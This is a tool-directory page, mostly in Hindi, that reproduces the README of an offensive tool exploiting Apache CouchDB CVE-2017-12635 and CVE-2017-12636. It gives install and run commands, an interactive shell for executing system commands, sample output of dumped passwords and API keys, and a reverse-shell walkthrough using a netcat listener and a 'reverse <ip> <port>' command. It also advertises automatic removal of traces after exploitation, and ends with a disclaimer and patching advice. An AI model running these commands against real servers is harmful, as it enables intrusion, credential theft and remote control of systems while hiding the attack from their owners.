Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
couchdb-exploit — विशेषाधिकार वृद्धि और RCE के लिए CouchDB CVE-2017-12635/12636 का शोषण करता है, फिर कमांड निष्पादन, डेटाबेस ब्राउज़िंग और रिवर्स शेल के साथ एक इंटरैक्टिव शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/darabium/couchdb-exploit
विशेषाधिकार वृद्धिशोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubdarabium/couchdb-exploit

couchdb-exploit

विशेषाधिकार वृद्धि और RCE के लिए CouchDB CVE-2017-12635/12636 का शोषण करता है, फिर कमांड निष्पादन, डेटाबेस ब्राउज़िंग और रिवर्स शेल के साथ एक इंटरैक्टिव शेल प्रदान करता है।

रिपॉजिटरी देखें
18 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚀 CouchDB एक्सप्लॉइट - CVE-2017-12635 और CVE-2017-12636

Python License CVE CVE

Apache CouchDB - विशेषाधिकार वृद्धि और रिमोट कोड निष्पादन

GitHub stars GitHub forks


📖 अवलोकन

यह टूल Apache CouchDB में दो गंभीर कमजोरियों का फायदा उठाता है:

CVEविवरणगंभीरता
CVE-2017-12635JSON पार्सिंग बायपास के माध्यम से विशेषाधिकार वृद्धि🔴 गंभीर
CVE-2017-12636क्वेरी सर्वर के माध्यम से रिमोट कोड निष्पादन🔴 गंभीर

यह कैसे काम करता है

  1. CVE-2017-12635: एडमिन उपयोगकर्ता बनाने के लिए Erlang और JavaScript पार्सर के बीच असंगत JSON पार्सिंग का फायदा उठाता है
  2. CVE-2017-12636: दुर्भावनापूर्ण Query Server कॉन्फ़िगर करने और सिस्टम कमांड निष्पादित करने के लिए एडमिन एक्सेस का उपयोग करता है

🎯 असुरक्षित संस्करण

त्वरित जाँच

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ विशेषताएँ

root@kitploit:~
✅ स्वचालित एक्सप्लॉइटेशन - सभी पर राज करने के लिए एक कमांड

✅ इंटरैक्टिव शेल - उपयोगकर्ता-अनुकूल कमांड इंटरफ़ेस

✅ डेटाबेस व्यूअर - सभी डेटाबेस और दस्तावेज़ ब्राउज़ करें

✅ पूर्ण JSON प्रदर्शन - संपूर्ण दस्तावेज़ सामग्री देखें

✅ ग्लोबल खोज - सभी डेटाबेस में कीवर्ड खोजें

✅ सिस्टम कमांड - लक्ष्य पर मनमाना कमांड निष्पादित करें

✅ रिवर्स शेल - पूर्ण इंटरैक्टिव शेल प्राप्त करें

✅ कमांड इतिहास - अपनी गतिविधियों का ट्रैक रखें

✅ ऑटो क्लीनअप - एक्सप्लॉइटेशन के बाद निशान हटाएँ

✅ रंगीन आउटपुट - पढ़ने और समझने में आसान

📦 स्थापना पूर्वापेक्षाएँ bash

Python 3.6+ required

python3 --version

क्लोन करें और इंस्टॉल करें bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

आवश्यकताएँ txt

requests>=2.25.0 urllib3>=1.26.0

🚀 उपयोग मूल उपयोग bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

कमांड लाइन विकल्प bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 कमांड्स

एक्सप्लॉइट सफल होने के बाद, आपके पास एक इंटरैक्टिव शेल होगा:

📊 उदाहरण

  1. सभी डेटाबेस सूचीबद्ध करें bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. डेटाबेस सामग्री देखें bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. क्रेडेंशियल खोजें bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. सिस्टम कमांड निष्पादित करें bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. रिवर्स शेल bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ स्क्रीनशॉट एक्शन में एक्सप्लॉइट

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot डेटाबेस व्यू

https://via.placeholder.com/800x400?text=Database+View रिवर्स शेल

https://via.placeholder.com/800x400?text=Reverse+Shell

⚠️ अस्वीकरण

root@kitploit:~
महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

    🚫 बिना स्पष्ट अनुमति के सिस्टम पर उपयोग न करें

    🚫 लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है

    🚫 केवल नियंत्रित वातावरण या अपने स्वयं के सिस्टम में उपयोग करें

    ✅ परीक्षण से पहले हमेशा लिखित प्राधिकरण प्राप्त करें

    ✅ जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

इस टूल का उपयोग करके, आप इन शर्तों से सहमत होते हैं।

🔐 सुरक्षा सुझाव

यदि आप सिस्टम व्यवस्थापक हैं:

root@kitploit:~
तुरंत CouchDB ≥ 1.7.0 या ≥ 2.1.1 में अपग्रेड करें

पोर्ट 5984 तक पहुंच प्रतिबंधित करने के लिए फ़ायरवॉल का उपयोग करें

प्रमाणीकरण सक्षम करें और मजबूत पासवर्ड का उपयोग करें

संदिग्ध गतिविधि के लिए लॉग की निगरानी करें

अपने इंफ्रास्ट्रक्चर का नियमित सुरक्षा ऑडिट करें

त्वरित समाधान bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 संदर्भ

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB सुरक्षा

Exploit-DB

👤 लेखक

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ समर्थन

यदि आपको यह उपयोगी लगता है:

root@kitploit:~
⭐ रिपॉजिटरी को स्टार करें

🐛 समस्याएँ रिपोर्ट करें

🔧 सुधारों में योगदान करें

📢 दूसरों के साथ साझा करें

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

सुरक्षा अनुसंधान के लिए ❤️ के साथ बनाया गया

⬆ ऊपर जाएँ

टूल डाउनलोड करें
संस्करणअसुरक्षितसुधारित संस्करण
Apache CouchDB < 1.7.0✅ हाँ1.7.0
Apache CouchDB 1.x.x✅ हाँ1.7.0
Apache CouchDB 2.0.0✅ हाँ2.1.1
Apache CouchDB 2.1.0✅ हाँ2.1.1
Apache CouchDB ≥ 2.1.1❌ नहीं-
कमांडविवरणउदाहरण
dbदस्तावेज़ गणना के साथ सभी डेटाबेस दिखाएँdb
view <db>डेटाबेस में सभी दस्तावेज़ देखें (पूर्ण JSON)view passwords
raw <db>कच्चा सर्वर प्रतिसाद दिखाएँraw admin
count <db>डेटाबेस में दस्तावेज़ों की गणना करेंcount users
search <keyword>सभी डेटाबेस में कीवर्ड खोजेंsearch admin
exec <command>सिस्टम कमांड निष्पादित करेंexec whoami
reverse <ip> <port>रिवर्स शेल सेटअप करेंreverse 10.0.0.1 4444
historyकमांड इतिहास दिखाएँhistory
helpयह मेनू दिखाएँhelp
exitसफाई के साथ बाहर निकलेंexit